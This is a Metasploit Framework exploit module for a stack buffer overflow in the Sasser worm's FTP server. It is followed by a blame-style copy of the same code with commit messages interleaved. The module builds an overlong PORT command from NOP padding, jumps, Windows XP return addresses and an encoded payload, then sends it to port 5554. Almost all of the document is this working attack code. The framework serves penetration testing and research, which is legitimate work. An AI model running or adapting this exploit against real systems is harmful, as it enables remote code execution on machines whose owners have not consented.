metasploit-framework/modules/exploits/windows/ftp/sasser_ftpd_port.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'		=> 'Sasser Worm avserve FTP PORT Buffer Overflow',
			'Description'	=> %q{
				This module exploits the FTP server component of the Sasser worm.
				By sending an overly long PORT command the stack can be overwritten.
			},
			'Author'	=> [ 'valsmith [at] metasploit.com>', 'chamuco [at] gmail.com>', 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'	=> MSF_LICENSE,
			'Version'	=> '$Revision$',
			'References'	=>
				[
					[ 'OSVDB', '6197'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Platform' 	=> ['win'],
			'Privileged'	=> false,
			'Payload'	=>
				{
					'Space'			=> 480,
					'BadChars'		=> "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'StackAdjustment'	=> -3500,
				},
			'Targets' 	=>
			[
				[ 'Windows XP SP0', { 'Ret' => 0x71aa32ad } ], #p/p/r ws2help.dll
				[ 'Windows XP SP1', { 'Ret' => 0x77e7633a } ], #p/p/r
			],
			'DisclosureDate' => 'May 10 2004',
			'DefaultTarget' => 1))

			register_options(
			[
				Opt::RPORT(5554),
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit = make_nops(267) + Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target['Ret']].pack('V')
		sploit << Rex::Arch::X86.jmp(0xfffffc13) + make_nops(15) + payload.encoded + make_nops(1530)

		send_cmd( ['PORT', sploit] , false)

		handler
		disconnect
	end

end
Added sasser_ftpd_port module port. git-svn-id: file:///home/svn/framework3/trunk@5478 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-19 14:40:50 +02:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log git-svn-id: file:///home/svn/framework3/trunk@6479 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-13 16:33:26 +02:00			`# http://metasploit.com/framework/`
Added sasser_ftpd_port module port. git-svn-id: file:///home/svn/framework3/trunk@5478 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-19 14:40:50 +02:00			`##`

			`require 'msf/core'`


This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 07:23:59 +02:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 06:50:37 +01:00			`Rank = AverageRanking`
Added sasser_ftpd_port module port. git-svn-id: file:///home/svn/framework3/trunk@5478 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-19 14:40:50 +02:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 07:23:59 +02:00			`include Msf::Exploit::Remote::Ftp`
Added sasser_ftpd_port module port. git-svn-id: file:///home/svn/framework3/trunk@5478 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-19 14:40:50 +02:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Sasser Worm avserve FTP PORT Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits the FTP server component of the Sasser worm.`
			`By sending an overly long PORT command the stack can be overwritten.`
			`},`
See #339. Massive cleanup of author names, make them consistent across modules git-svn-id: file:///home/svn/framework3/trunk@7075 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 23:30:45 +02:00			`'Author' => [ 'valsmith [at] metasploit.com>', 'chamuco [at] gmail.com>', 'patrick' ],`
Added sasser_ftpd_port module port. git-svn-id: file:///home/svn/framework3/trunk@5478 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-19 14:40:50 +02:00			`'Arch' => [ ARCH_X86 ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'OSVDB', '6197'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Platform' => ['win'],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 480,`
			`'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Windows XP SP0', { 'Ret' => 0x71aa32ad } ], #p/p/r ws2help.dll`
			`[ 'Windows XP SP1', { 'Ret' => 0x77e7633a } ], #p/p/r`
			`],`
			`'DisclosureDate' => 'May 10 2004',`
			`'DefaultTarget' => 1))`

			`register_options(`
			`[`
			`Opt::RPORT(5554),`
			`], self.class)`
			`end`

			`def exploit`
			`connect`

			`print_status("Trying target #{target.name}...")`

			`sploit = make_nops(267) + Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target['Ret']].pack('V')`
			`sploit << Rex::Arch::X86.jmp(0xfffffc13) + make_nops(15) + payload.encoded + make_nops(1530)`

			`send_cmd( ['PORT', sploit] , false)`

			`handler`
			`disconnect`
			`end`

add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 06:50:37 +01:00			`end`